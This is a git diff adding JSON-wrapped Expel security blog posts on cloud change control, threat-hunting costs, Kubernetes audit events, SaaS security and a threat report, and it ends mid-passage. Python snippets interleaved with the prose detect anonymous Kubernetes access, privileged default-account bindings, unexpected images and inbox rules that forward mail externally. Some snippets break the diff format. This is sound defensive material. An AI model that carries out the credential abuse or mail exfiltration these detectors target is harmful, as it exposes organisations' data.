With the new world of configuration-driven infrastructure, you\u2019ve got an opportunity to implement a new change control process. Your new process can rely on \u2014 gasp \u2014 automation to review configuration changes against your org\u2019s best practices, conduct vulnerability scanning for new software and enforce security policies before changes are made. Now instead of periodically reviewing a spreadsheet to make sure your controls are still applicable and useful, you can now build controls right into your CI/CD pipeline. This visual from The New Stack is a great representation of how you\u2019re able to build these controls right into a product or service in the development process: Image source Part 2: Cloud apps Then \u2026 Back in the day you delivered software services the old-fashioned way \u2014 you ran those things yourselves! You had a cluster of Microsoft Exchange servers and an Oracle database running your CRM. You had on-call rotations and people who knew the way to the datacenter. Oh, and remember those Friday nights near the end of a quarter when you were frantically swapping out hard drives to get database clusters back online? Also, Limp Bizkit was a thing. Back then, you had all the control in the world to monitor whatever and however you wanted. But the costs were high. You were buying drives, constantly training people, triaging networking failures, dealing with power outages \u2026 all that stuff was your problem. You were optimizing for the cost of running and maintaining critical software with specific controls \u2014 and those controls were really the people who could upgrade and access running servers. You probably also had controls that required employees to physically be in an office to get work done (yeah, I\u2019m talkin\u2019 about pre-VPN days). Now \u2026 Enter SaaS applications . And lots of them. Today, email\u2019s delivered via Office 365 or G-Suite through servers you\u2019ll never see. There\u2019s no physical boundary you can monitor or control, no server to instrument. You\u2019ve gotta rely on built-in application and audit logs to monitor these applications. The good news is that (for the most part) these applications come with excellent application logging built right into them. For example, SalesForce has extensive audit logging built in as a button-click. On top of that, advances in data science have taken user-based anomaly detection from something you read about in academic papers to something that\u2019s now built right into many platforms in SIEM products like Exabeam and Sumo Logic. Sure, there\u2019s a little bit of a learning curve here \u2014 you\u2019ll have to spend some time understanding these new application logs and how to instrument them to monitor for unusual or malicious activity. Even though this new world requires some learning up front, there\u2019s more value for you and your org in the long run, because you\u2019re able to spend time focusing on the security of the application, not on keeping the lights on. Want more specific recommendations on how to get started with protecting your cloud apps? Then you need to read this post: \u201c Three tips for getting started with cloud application security. \u201d Part 3: Custom apps Then \u2026 In the past, rolling out new apps was a long and painful process \u2014 developers spent time testing, sys admins were deploying and then there were bumps in the road. 
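Before we get to the custom apps story, here is a deliberately tiny illustration of the Part 1 idea above of building controls right into the CI/CD pipeline: a check like this can run on every proposed change and fail the build before a risky configuration ever ships. It assumes a simplified JSON rendering of the planned infrastructure; the structure shown is hypothetical, not any specific tool's schema, so adapt the field paths to your IaC tool's real output.

import json, sys

# Fail the pipeline if any proposed security group rule is open to the world
# on a port other than 443. Input is a hypothetical, simplified plan document.
def risky_rules(plan):
    findings = []
    for rule in plan.get("security_group_rules", []):
        if rule.get("cidr") == "0.0.0.0/0" and rule.get("port") != 443:
            findings.append(rule)
    return findings

if __name__ == "__main__":
    plan = json.load(open(sys.argv[1]))
    problems = risky_rules(plan)
    for rule in problems:
        print(f"blocked: {rule.get('name', 'unnamed rule')} exposes port {rule.get('port')} to 0.0.0.0/0")
    sys.exit(1 if problems else 0)  # a non-zero exit code fails the CI job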
Developers then had to patch in production (\u201cIt\u2019s the last time we\u2019ll do this, I swear!\u201d) and then finally the system worked. Now \u2026 With the cloud, app development and deployment happens much faster \u2014 if developers and the operations team work together to build an environment with the right balance between controls, processes, velocity and automation, that is. Custom applications require that the security and operations team understand the application in order to secure it. If you don\u2019t have a topological control-point like a fixed network egress this can feel daunting, but the same configuration-as-code that makes your developers more effective also let your security team understand the application and monitor changes. The focus in modern DevOps on solid application logging is a good thing because it means that security signals are already built into your custom app when it gets deployed. And most modern deployment pipelines take advantage of configuration checking, image scanning and compliance checking \u2014 and they\u2019re usually (easy) click-to-enable type features. As with infrastructure and SaaS, the promise of infrastructure-as-code and application logging requires a partnership with the development team, as well as some expertise in modern DevOps tool chains (we\u2019re fans of several infrastructure-as-code tools such as Terraform and Ansible ). What now? The cloud has plenty of benefits \u2014 when it comes to security, we just need to re-evaluate the contents of our bag of tricks. Some tried-and-true methods from our \u201crack and stack\u201d days are no longer relevant. But if you approach cloud security from the three vantage points described above, you\u2019ll be well on your way to building a solid security foundation. Have more questions about cloud? Drop us a note . We\u2019d love to chat." +} \ No newline at end of file diff --git a/threat-hunting-build-or-buy.json b/threat-hunting-build-or-buy.json new file mode 100644 index 0000000000000000000000000000000000000000..eecb48df9c0e1a58a9e095258ec992081865b6da --- /dev/null +++ b/threat-hunting-build-or-buy.json @@ -0,0 +1,6 @@ +{ + "title": "Threat hunting: Build or buy?", + "url": "https://expel.com/blog/threat-hunting-build-or-buy/", + "date": "Jan 11, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Threat hunting: Build or buy? Engineering \u00b7 5 MIN READ \u00b7 BRYAN GERALDO \u00b7 JAN 11, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Faced with ever-evolving threats in this cyber-fueled world, threat hunting is critically important. But your ability to apply a consistent level of analytic rigor and produce valuable findings while threat hunting relies heavily on your available tech and expertise. Plus, finding the time and space to effectively implement and participate in threat hunting can be difficult. So, what\u2019s the best option \u2013 build your own hunting program or buy a hunting service? In my previous blog post , I explained what hunting is and why it\u2019s important for security practitioners to understand the value it provides to detection and response. In this blog post, I\u2019m going to cover what to consider as you add hunting to your org\u2019s security program (like cost and security team capacity) and your options when you don\u2019t have the resources to build the threat hunting program yourself. 
A history lesson In the 1950s, my wife\u2019s grandfather \u2014 Bill McPhee \u2014 created the first computer-based predictive behavioral model to identify patterns of human behavior. According to author Jill Lepore\u2019s 2020 book, If Then, this model may have played a role in helping elect John F. Kennedy (JFK) to the presidency. How? By identifying patterns of potential voter behavior. It all started with a hypothesis \u2014 can advanced data analysis of historical voting patterns be used to predict or influence election outcomes? To test the hypothesis, a smart group of people used specially designed technology to analyze historical voting data among different voter groups. These groups were defined by a collection of shared characteristics (religious affiliation, income level, gender, geographic location, etc.). The analysis identified behavioral patterns within these voter groups that helped JFK\u2019s team tailor campaign messaging for those specific audiences. And those audiences ultimately played a major role in his narrow victory. The use of advanced data analysis to confirm or disprove a hypothesis is still as prevalent today as it was then. For example, it\u2019s a key component of threat hunting. A strong hunting program requires 1) an understanding of known attack behaviors; 2) awareness of your attack surface (that is, what is at risk) to inform hypotheses for good hunts; and 3) the right data and expertise to not only ensure that you can separate the signal from the noise, but that you can create good, repeatable paths for analysis. And hunting takes that analysis further, using a combination of code and humans to conduct cross-correlation and frequency analysis that extends the monitoring of an infrastructure beyond the one-sided view you can expect from detections alone. You need to maintain your hunting program if you want it to succeed. A good hunting program includes tools and processes that ensure analytic rigor (e.g., repeatable analysis and results), a sound feedback loop for hunts, and a team that stays up-to-date on the latest research and how best to use your security tools. All of this requires human resources, time, and a strategy that allows you to evolve your program as needed. Build? Cost of building a hunting program The hurdle that many orgs have to overcome is whether to buy or build a threat hunting program. And if building, can the program be effectively implemented and managed on an ongoing basis? Let\u2019s take a look at a few cost estimates associated with building a security operations center (SOC), closely aligned with similar figures outlined by Ponemon Institute in 2021. SOC-related costs are good indicators of hunting costs because many hunting programs rely on the same tech and staff as the org\u2019s SOC. Typical SOC cost averages: Annual salary for a security analyst: ~$115,000. Intended annual spend for tools: ~$180,000 \u2013 SIEM ~$340,000 \u2013 Security Orchestration Automation Response (SOAR) ~$330,000 \u2013 Extended detection & response (XDR) Spending on security engineering to make it all work: ~$2.5 million per year Also, looking at recent data from a SANS study, we see that most orgs don\u2019t have full-time hunting staff.
Just 19 percent of respondents were \u201cworking as full-time threat hunters at their organizations\u201dand 75 percent of orgs were hunting \u201cusing staff that also fulfill other roles within the organization.\u201d To keep things simple, let\u2019s exclude the budget for security engineering. We\u2019ll also assume all of the relevant people and tech are working on threat hunting 25 percent of the time. Check out the total amount in the chart above. Excluding the cost for security engineering, the average cost of a hunting program (at 25 percent of the annual SOC spend) could easily meet or exceed $200,000. This breaks down to approximately $16,000 per month for a hunting program that may not be fully used. Then you need to take into account that those hunting efforts are likely limited to a particular tech platform \u2013 like your endpoint detection and response (EDR) tool and infrastructure like Windows Active Directory (AD). Those hunting efforts would have limited visibility across the whole environment. Does that cost seem reasonable? To us, it only seems reasonable if, for example, you\u2019re able to identify something during every hunt that reduces the dwell time (time spent undetected in the environment) of an attacker. But finding an attacker is never a guarantee. Plus, hunting with limited visibility, experience, or time can yield sub-par results and findings. And since hunting isn\u2019t a full-time effort for many orgs, the struggle to implement, manage, and measure hunting continues. As a result, many orgs find themselves spending a lot of money to build a hunting program that doesn\u2019t provide useful results and is difficult to maintain. \u201cWhen they aren\u2019t focusing on threat hunting, 75% of respondents are focusing on incident response or forensics. Just over half (51%) performed a security architecture/engineering role, and a little over a third (37%) performed system administration functions.\u201d \u201cAlmost half (45%) of respondents run an ad hoc hunting process that is dependent on their needs. That makes it more difficult to have dedicated resources for threat hunting and leads to less consistent results. Also, most respondents measure the success of threat hunting on an ad hoc basis, making it even more difficult to get numbers that justify employing enough dedicated threat hunters.\u201d \u201cBecause threat hunting requires the allocation of budget and resources, measuring the effect it has is important. In last year\u2019s survey, we established that most organizations still struggle to measure threat hunting in a consistent way.\u201d To sum it up: a lot of orgs are making efforts to strengthen their security (at considerable cost) with investments that often include or align with threat hunting. Yet, these same orgs use staff for hunting whose primary responsibilities are tied to other groups (like SOC or Incident Response). Even with a larger focus on hunting, these orgs often have limited time available to dedicate to hunting and limited visibility into their infrastructure. Also, without a good process and tools to capture and track results, it\u2019s hard to measure the impact of these hunting efforts over time. Buy? Value of buying a hunting service So, if your org knows threat hunting is important but doesn\u2019t have the time and resources to dedicate to effective hunting, what\u2019re your options? Is it worth engaging an outside service to augment the efforts you\u2019re already making? 
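Before weighing that option, it is worth sanity-checking the math above for yourself. A back-of-the-envelope version, using the averages listed earlier and the 25 percent utilization assumption (your real numbers will differ):

# Rough hunting-program cost estimate, excluding security engineering.
analyst_salary = 115_000
tooling = 180_000 + 340_000 + 330_000   # SIEM + SOAR + XDR annual spend
hunting_share = 0.25                    # people and tech hunt ~25% of the time

annual = (analyst_salary + tooling) * hunting_share
print(f"annual:  ~${annual:,.0f}")      # ~$241,000, comfortably over the $200k mark
print(f"monthly: ~${annual / 12:,.0f}") # ~$20,000; roughly $16,700 if you use the $200k floor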
Can a hunting partner give you extra coverage and peace of mind? To us, it\u2019s a resounding yes. The best part? You also save money. According to Aite-Novarica Group\u2019s recent Threat Hunting Impact Report , \u201cAdding this service should be an easy decision for clients to make in light of the value provided. For less than the cost of bringing a single threat hunter on staff, organizations can benefit from a fully managed hunting service utilizing highly experienced hunters and an automated hunting platform.\u201d Hunting partners should also give you guidance on how to use hunting strategically and set up measurement frameworks. Here at Expel, we\u2019ve identified ways to track the effectiveness of using our hunting service . For example, when an org implements short-term remediations or long-term operational tools and processes as the result of our hunt findings, we track the outcomes over time. Stay tuned for an upcoming blog discussing one of these tracking tools in more depth \u2013 our resilience recommendations. Ready to learn more? Watch my Fireside chat with ISMG : \u201cThe evolution of threat hunting and why it\u2019s more important now than ever.\u201d" +} \ No newline at end of file diff --git a/three-kubernetes-events-worth-investigating.json b/three-kubernetes-events-worth-investigating.json new file mode 100644 index 0000000000000000000000000000000000000000..17bc5775a1c05a664d1a7ab13c162733db95eef3 --- /dev/null +++ b/three-kubernetes-events-worth-investigating.json @@ -0,0 +1,6 @@ +{ + "title": "Three Kubernetes events worth investigating", + "url": "https://expel.com/blog/three-kubernetes-events-worth-investigating/", + "date": "Oct 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Three Kubernetes events worth investigating Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 OCT 24, 2022 \u00b7 TAGS: Cloud security Monitoring your Kubernetes environment is important \u2014 especially if you\u2019re running production workloads. Let\u2019s say you\u2019ve already done the work of collecting the Kubernetes audit logs\u2026 what\u2019s next? What should you actually be looking for? Here at Expel, we\u2019ve been working on Kubernetes security monitoring for a while and have some insights to share. Whether you run Kubernetes yourself or use a managed provider like GKE, EKS, or AKS, certain events are worth investigating. They might indicate a mistake or, worst-case scenario, you might have an attacker poking around inside your Kubernetes cluster. Successful authorization of an anonymous request Okay, so nobody has Kubernetes clusters with public endpoints anymore, right? \u2026 Right? (Cue awkward silence\u2026) As it turns out, this is still really common. A recent internet scan by Shadowserver found nearly 400,000 publicly accessible Kubernetes API endpoints. We\u2019re not here to name-and-shame, but there are some real reasons you may want a public API endpoint. It\u2019s pretty convenient, for example. But that convenience comes with associated risk. You\u2019ll want to make sure that anonymous access is disabled (or well controlled) to avoid leaking sensitive information about your workloads (or worse, secrets that lead to a larger compromise). Luckily, this is something we can easily detect using the Kubernetes audit log. When API requests are logged, anonymous users are categorized under the \u201csystem:anonymous\u201d group, letting you easily look for any requests that were allowed for that group. 
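One last practical note: whether you build or buy, the analytic rigor described above often boils down to repeatable, code-assisted analysis like the classic least-frequency-of-occurrence hunt. Here is a minimal sketch that stacks a field (say, process command lines exported from your EDR) and surfaces the rarest values for a human to review; the file name and column name are placeholders for whatever your tooling actually exports.

import csv
from collections import Counter

# Stack command lines across the fleet and surface the rarest ones.
counts = Counter()
with open("process_events.csv", newline="") as fh:   # placeholder export
    for row in csv.DictReader(fh):
        counts[row["command_line"]] += 1

# The long tail is where hunt leads tend to live; 25 is just a starting point.
for command_line, seen in sorted(counts.items(), key=lambda kv: kv[1])[:25]:
    print(f"{seen:>4}  {command_line}")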
Watch for requests for unexpected resource kinds. Quick tip: Some managed providers have default built-in roles that grant anonymous users some very limited permissions (for cluster discovery). Examples include GKE\u2019s system:discovery and system:public-info-viewer roles . Anonymous requests for these default roles might be okay, depending on your risk model. Default service account bound to privileged cluster role Default service accounts are one of the most common ways to escalate privileges in Kubernetes. Unless you explicitly change this behavior, Kubernetes will create and auto-mount default service account credentials into pods as they are created. This isn\u2019t a huge issue if you aren\u2019t using that default service account for anything, as they don\u2019t have any permissions by default. However, if you granted default service account permissions with a role binding, an attacker could use those permissions against you. For this reason, it\u2019s a good idea to look out for the creation of a cluster role binding that maps a default service account to a privileged cluster role. This practice has the unintentional effect of granting cluster-wide permissions to all pods created in the service account\u2019s namespace (except for pods that opt out of the credentials or choose a different service account). In any case, it\u2019s a dangerous practice that usually leads to unnecessary exposure of credentials with API permissions. This is also easy to detect in the Kubernetes audit log. Simply look for the creation or modification of a role binding where the subjects include a default service account and the referenced role is privileged (like view, edit, admin, or cluster-admin). Quick tip: Service account subject names start with \u201csystem:serviceaccount:\u201d and end with \u201c:default.\u201d Pod created with an unusual image It\u2019s a good idea to get a handle on the images running in your cluster. From what we\u2019ve seen of the Kubernetes threat landscape so far, coin mining tends to be a common goal for opportunistic attackers. It isn\u2019t sophisticated, and it\u2019s not a good look if you\u2019re affected. We recommend a deployment model where there\u2019s only one way to deploy images (usually a CI/CD service) rather than allowing users to create pods manually. If you implement this approach, and expect images to only come from your private image repository, it\u2019s a great opportunity to discover pods that don\u2019t follow those rules. Even if you don\u2019t have your deployment process locked down to that degree, there are some images you probably never expect to see in your clusters and are worth examining. Quick tip: Pod images are logged in the format /:. This makes it easy to look out for unexpected repositories or image names. Taking it to the next level The Kubernetes audit log is a great source of high-fidelity security signals. We\u2019ve walked through three ideas to get you started, but there\u2019s a whole world of opportunity to build out security alerting that helps you identify and quickly respond to issues before they become full-on crises. Expel aims to make Kubernetes security accessible to everyone. If you\u2019d like to learn more about how we can help, contact us ." 
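If you want a starting point for turning those three ideas into code, here is a minimal sketch that walks a file of Kubernetes audit events (one JSON object per line) and flags anonymous requests that were allowed, default service accounts bound to privileged roles, and pod images from outside a trusted registry. It assumes the standard audit event fields (user, annotations, objectRef, requestObject); exact contents vary by provider and audit policy, and the registry name is a placeholder, so treat this as a skeleton to adapt.

import json

PRIVILEGED_ROLES = {"view", "edit", "admin", "cluster-admin"}
TRUSTED_REGISTRY = "registry.example.internal"  # placeholder for your private registry

def review(event):
    findings = []
    if event.get("annotations", {}).get("authorization.k8s.io/decision") != "allow":
        return findings
    obj = event.get("objectRef") or {}
    req = event.get("requestObject") or {}

    # 1. Successful authorization of an anonymous request
    if event.get("user", {}).get("username") == "system:anonymous":
        findings.append(f"anonymous request allowed: {event.get('verb')} {event.get('requestURI')}")

    # 2. Role binding that maps a default service account to a privileged role
    if event.get("verb") in ("create", "update", "patch") and obj.get("resource", "").endswith("rolebindings"):
        role = (req.get("roleRef") or {}).get("name", "")
        subjects = req.get("subjects") or []
        if role in PRIVILEGED_ROLES and any(
                s.get("kind") == "ServiceAccount" and s.get("name") == "default" for s in subjects):
            findings.append(f"default service account bound to privileged role: {role}")

    # 3. Pod created with an image from outside the trusted registry
    if event.get("verb") == "create" and obj.get("resource") == "pods":
        for container in (req.get("spec") or {}).get("containers", []):
            if not container.get("image", "").startswith(TRUSTED_REGISTRY):
                findings.append(f"unexpected image: {container.get('image')}")
    return findings

with open("audit.log") as fh:          # one JSON audit event per line
    for line in fh:
        for finding in review(json.loads(line)):
            print(finding)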
+} \ No newline at end of file diff --git a/three-tips-for-getting-started-with-cloud-application-security.json b/three-tips-for-getting-started-with-cloud-application-security.json new file mode 100644 index 0000000000000000000000000000000000000000..a1e099900d8ac593de27f6c44d73d1c41c6b7d5c --- /dev/null +++ b/three-tips-for-getting-started-with-cloud-application-security.json @@ -0,0 +1,6 @@ +{ + "title": "Three tips for getting started with cloud application security", + "url": "https://expel.com/blog/three-tips-getting-started-cloud-application-security/", + "date": "Jan 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Three tips for getting started with cloud application security Security operations \u00b7 3 MIN READ \u00b7 JUSTIN BAJKO AND PETER SILBERMAN \u00b7 JAN 22, 2019 \u00b7 TAGS: Cloud security / How to / Planning If you\u2019ve been feeling like your SaaS security knowledge is a bit cloudy (heh!), then you\u2019ve come to the right place. Last fall, we shared some initial thoughts on how to get a grip on your cloud security strategy. But we continue to hear more cloud-related questions from our customers, particularly when it comes to cloud application security. For example, these three come up week after week: Who\u2019s really responsible for protecting what? How do I actually get started? Where should I start? What types of things should I be looking for, and where? And how? Here\u2019s our two cents. First things first: Who\u2019s responsible for protecting what? This is the million-dollar question: When you move to the cloud, who\u2019s responsible for protecting what? When it comes to security, you\u2019ve got to think about your cloud infrastructure (the systems and workloads you\u2019re running in AWS, Microsoft Azure or Google) and your cloud applications (Office 365, Salesforce, Workday, etc.) as two separate things because each of them comes with different types of security risks and requires different investigation techniques. (By the way, we\u2019ve got an entire post filled with Office 365 security best practices for you, which is right here. ) And while, in the case of SaaS applications, the security of the infrastructure is the responsibility of your cloud service provider, the security of your data that lives in your cloud applications and the user accounts allowed to access those applications are your responsibility. Sure, you\u2019re probably using all of those convenient SaaS applications so you don\u2019t have to maintain the physical hardware and networks they run on, but it\u2019s still your data, so it\u2019s your responsibility to know who\u2019s accessing it and whether that access is authorized. #jobsecurity Monitoring SaaS applications is a different ballgame because you\u2019re not looking for malware on a laptop anymore. Devices are no longer your endpoints \u2013 your users are. Monitoring a SaaS environment is about understanding user behavior and that starts with understanding the signals your SaaS provider is sending you and verifying that they\u2019re properly configured. What are the must-dos when it comes to protecting SaaS applications? We could answer this question with an entire scroll of to-dos (this is one of our favorite topics, ya know), but three seems like a manageable number. So, here are the three most important things you can do if you\u2019re just getting started with cloud application security. Identify all of your cloud applications. Sounds simple, but trust us \u2014 it\u2019s not. 
There are probably at least a couple (dozen?) SaaS apps running in your environment that you don\u2019t know about. Time to take inventory. There are a bunch of ways to get started. For example, if you\u2019ve got one of the firewalls or intrusion detection system (IDS) products that inspects traffic, it can give you a report of the cloud applications people are using in your environment. You can also use a cloud access security broker (CASB) to shine a light on the applications being used, and begin to enforce some policies about their use. Once you\u2019ve got that list you can use it to audit the different contracts and services that each department has subscribed to within your org. Gather the log data from these applications. Once you gather the log data from each app, store it in a place where it\u2019s easy to search, so you can write detections based on certain conditions. What should you be looking for, exactly? Watch for common signs of compromise, like logins coming from a VPN provider, a burst of document sharing activity or application-specific signs of misuse and compromise like an email rule that\u2019s created to forward emails to an inbox outside the corporate domain (just to name a few). Focus on the users. Say it with me: \u201cUsers are the new endpoints.\u201d Here at Expel, our cloud application detections fall into about five classes of detections, all of which \u2013 you guessed it \u2013 examine user behavior. Each class has specific detections for a given application \u2013 like authentication, email management and resource management. What are some common detections that would require us to alert a customer and perform further investigation, you ask? One example is finding a user who is authenticating from a VPN service provider. This isn\u2019t necessarily a smoking gun, but it\u2019s uncommon enough that we\u2019d want to look more deeply into that user\u2019s activity to see if anything else they\u2019re doing looks fishy. Another example is a user configuring an inbox rule that auto-forwards all their corporate email to a Yahoo account (or really any external email). Another anomaly we detect is when a user anonymously shares a lot of documents in a short period of time. We alert our customers about user behaviors that present potential risks to their data, and then partner with their security teams to investigate and respond to those threats. Putting it into practice We\u2019ve already seen success with our customers in helping them better understand what\u2019s happening with their data in some of these cloud applications. We\u2019ve been able to create detections that are specific to their applications (and even their users) \u2013 all of which give us and our customers better signals that help us understand quickly and accurately if there\u2019s a security risk. So \u2026 if you\u2019re looking for a place to start your cloud application security journey, these three straightforward tips are a good jumping off point. And if you need help or have questions, we\u2019ll be here \u2013 drop us a note." 
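To make that auto-forwarding example concrete, here is a minimal sketch that scans exported mailbox audit events for new inbox rules that forward or redirect mail outside the corporate domain. It assumes you have already pulled the audit records into JSON lines and that the fields shown (operation, parameters, ForwardTo, RedirectTo) are flattened into simple dicts and lists; real exports (for example, the Office 365 unified audit log) nest these differently, so map them to your actual schema.

import json

CORPORATE_DOMAIN = "@example.com"   # placeholder for your real domain

def external_forwarding_rules(path):
    hits = []
    with open(path) as fh:
        for line in fh:
            event = json.loads(line)
            if event.get("operation") != "New-InboxRule":
                continue
            # Assumes parameters were flattened into a dict of rule settings.
            params = event.get("parameters", {})
            targets = params.get("ForwardTo", []) + params.get("RedirectTo", [])
            external = [t for t in targets if CORPORATE_DOMAIN not in t.lower()]
            if external:
                hits.append((event.get("user"), external))
    return hits

for user, targets in external_forwarding_rules("mailbox_audit.jsonl"):
    print(f"{user} created a rule forwarding to: {', '.join(targets)}")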
+} \ No newline at end of file diff --git a/top-3-takeaways-from-rsa-conference-2022.json b/top-3-takeaways-from-rsa-conference-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..46a0da4ed5a1d460cb17e1ed1ec372e8b54b62db --- /dev/null +++ b/top-3-takeaways-from-rsa-conference-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top 3 takeaways from RSA Conference 2022", + "url": "https://expel.com/blog/top-3-takeaways-from-rsa-conference-2022/", + "date": "Jun 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 3 takeaways from RSA Conference 2022 Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 JUN 16, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools That\u2019s a wrap on RSA Conference 2022, and we\u2019re still dazed from the four days we spent on the show floor. For many of us, it was the first major in-person conference since the onset of the pandemic, and our time back at Moscone was both exciting and familiar. The Expel booth buzzed with friends old and new as we made our exhibitor debut. To kick things off, we popped champagne and heard from our founders about how Expel came to be. Then, through demos and conversations, we got to share our approach to security and show you why we think it can even be delightful. Harry Mack brought down the house with a series of improvisational freestyle rap performances that had folks dancing in the aisle. We attended sessions and made connections with industry colleagues from around the world. And our friendly bots, Josie\u2122 and Ruxie\u2122, even made an appearance ! Now that we\u2019ve had time to reflect on this year\u2019s conference, here are three of the big takeaways and highlights from our time at Moscone. Hope and encouragement won over fear, uncertainty, and doubt. In an industry that often relies on FUD (fear, uncertainty, and doubt) to compel action, the common thread from the keynote speakers was a message of hope. Notable leaders from industry giants (think: RSA, Cisco, and VMware) took to the stage to remind us that if we pull together, we have the power to change the world for the better. Speakers took lessons learned from recent history to lay out trends they\u2019re seeing across their customer bases, and we all left sessions feeling encouraged. Cybersecurity is for everyone. The only way to stay ahead in a constantly evolving threat landscape is through an approach to security that\u2019s also constantly evolving. What does that look like? Technological innovation, human ingenuity and expertise, and inclusivity in our defender community. Vasu Jakkal, Corporate Vice President for Microsoft Security, Compliance, Identity Management and Privacy, argued that the best way to overcome this challenge is to create a more inclusive environment where people from many different backgrounds are empowered to do their best work and thrive. We echo this sentiment wholeheartedly at Expel, and stand by the belief that we\u2019re \u201cbetter when different.\u201d We know we\u2019re stronger when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. (More on Jakkal\u2019s ideas for breaking down barriers in cybersecurity, and how we practice equity, diversity, and inclusion on a day-to-day basis at Expel in our day two RSA recap .) In a time of economic change, ROI is more important than ever. 
While this year\u2019s conference was a taste of normalcy, we can\u2019t ignore that the current economic situation has and will have an effect on the industry\u2014for customers and vendors alike. With so many companies vying for their share of the market, the security providers that will ultimately stand out are the ones that can demonstrate value and deliver a positive return on investment (ROI). Companies that put an emphasis on enhanced reporting\u2014helping customers understand and translate their investments to decision makers\u2014will stand above the competition. The overwhelming sentiment from the week was how happy security folks were to be back in person with this close-knit community. Our cheeks are still aching from all the smiling, as we reconnected with colleagues and even met some in-person for the first time. It can sometimes be easy to forget, but there\u2019s a human element that sits at the core of the security industry. It\u2019s conferences like this\u2014where we\u2019re able to swap stories, trade lessons learned, and share a laugh\u2014that remind us why we do what we do. The jet lag is finally wearing off and we\u2019re already getting excited to gear up for next year! ICYMI, we spent the week leading up to RSA sharing news about recent momentum , product advancements , and even a new partnership with Armis \u2014and we can\u2019t wait to keep the good news coming. If you\u2019re curious about what makes Expel, Expel\u2014 we\u2019d love to chat anytime ." +} \ No newline at end of file diff --git a/top-5-takeaways-expel-quarterly-threat-report-q2.json b/top-5-takeaways-expel-quarterly-threat-report-q2.json new file mode 100644 index 0000000000000000000000000000000000000000..2e06374f1bfd936c71c8e223255075d8155f70a3 --- /dev/null +++ b/top-5-takeaways-expel-quarterly-threat-report-q2.json @@ -0,0 +1,6 @@ +{ + "title": "Top 5 takeaways: Expel Quarterly Threat Report Q2", + "url": "https://expel.com/blog/top-5-takeaways-expel-quarterly-threat-report-q2-2022/", + "date": "Aug 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 5 takeaways: Expel Quarterly Threat Report Q2 Security operations \u00b7 3 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 AUG 9, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Just like that, a new quarter is upon us and we\u2019re back with our second Expel Quarterly Threat Report. The series, which debuted in the first quarter (Q1) of 2022, provides cybersecurity data, trends, and recommendations to help you protect your organization. The second quarter (Q2) edition dives into the trends our security operations center (SOC) identified through investigations into alerts, email submissions, and threat hunting leads from April 1 to June 30, 2022. We\u2019ve identified some insights and patterns to help guide strategic decision-making and operational processes for your team using a combination of time-series analysis, statistics, customer input, and analyst instinct. Our goal? By sharing how attackers got in, and how we stopped them, we hope to translate the events we detect into security strategy for your organization. Here are our top five takeaways. TL;DR: Microsoft blocking macros by default is changing the game for threat actors and defenders alike; legacy MFA in cloud apps and cloud identity providers simply isn\u2019t cutting it; and business email compromise (BEC) will continue to reign supreme in Q3. 
1: Hackers are shifting their pre-ransomware approach, thanks in part to Microsoft In Q1, our report noted that macro-enabled Microsoft Word documents (VBA macro) and Excel 4.0 macros were the initial attack vectors in 55% of all pre-ransomware incidents. But in Q2, Excel 4.0 macro attacks fell to 9% and VBA macro initial attacks dropped to zero. What changed? Microsoft began blocking macros by default in Office applications, so threat actors all but abandoned the use of VBA and Excel 4.0 macros for initial entry. Instead, they opted to use ISO, LNK, and ZIP files that store other files for initial access. In fact, the use of ISO files for initial access increased 15% compared to Q1. We\u2019re advising our customers to block ISO files at email and web gateways. But proceed with caution: many businesses use these files in the regular course of business. Also, consider unregistering ISO file extensions in Microsoft Windows Explorer. By doing so, ISO files will no longer be recognized by Windows and double-clicking won\u2019t result in program execution. 2: Identity-based attacks are still the elephant in the room\u2026 and they aren\u2019t going away Allie Mellen, independent senior analyst, recently tweeted, \u201c Identity is the new endpoint ,\u201d and we tend to agree. Identity-based attacks (credential theft, credential abuse, long-term access key theft) accounted for 56% of all incidents handled by our SOC in Q2. Business email compromise (BEC) remains public enemy number one, accounting for 45% of all incidents\u2014with 100% occuring in Microsoft Office 365 (O365). For context here, we monitor roughly twice as many O365 tenants as we do Google Workspace, but the fact that we didn\u2019t identify any BEC attempts in Google Workspace is pretty interesting. What\u2019s more, 19% of BEC attempts bypassed MFA in O365 using legacy protocols (up 16 percentage points from Q1). The takeaway? Single-factor authentication backed by conditional access policies aren\u2019t enough to prevent unauthorized access. BEC (unauthorized access into email apps) and business application compromise (BAC, unauthorized access into application data) made up 51% of all incidents, while identity-based attacks in popular cloud environments like AWS accounted for 5%. Unfortunately, we expect threat actors will continue to favor identity-based attacks in Q3. 3: The majority of our leads come from a cloud application or identity provider integration An effective detection and response strategy is more than EDR\u2014it\u2019s identity-oriented. Fifty-four percent of all identified Q2 incidents began with an initial lead from a cloud application or identity provider integration; 38% started with an initial lead from an EDR integration. While network (NDR) and SIEM make up only 7% of initial leads into Q2 incidents, these technologies provide SOC analysts with significant investigative capabilities and power orchestration in the Expel Workbench\u2122. 4: Automation frees up human analysts to do what they do best To improve SOC scale and quality, we automate a lot of our analysts\u2019 repetitive tasks\u2014things like \u201cgrab the Windows event log\u201d or \u201clet\u2019s take a look at 30 days of authentication activity for a given user.\u201d This frees analysts up to focus on risk-based decisions for our customers vs. spending time fighting with a query language to retrieve results. How much of a burden does orchestrated automation take off analysts? 
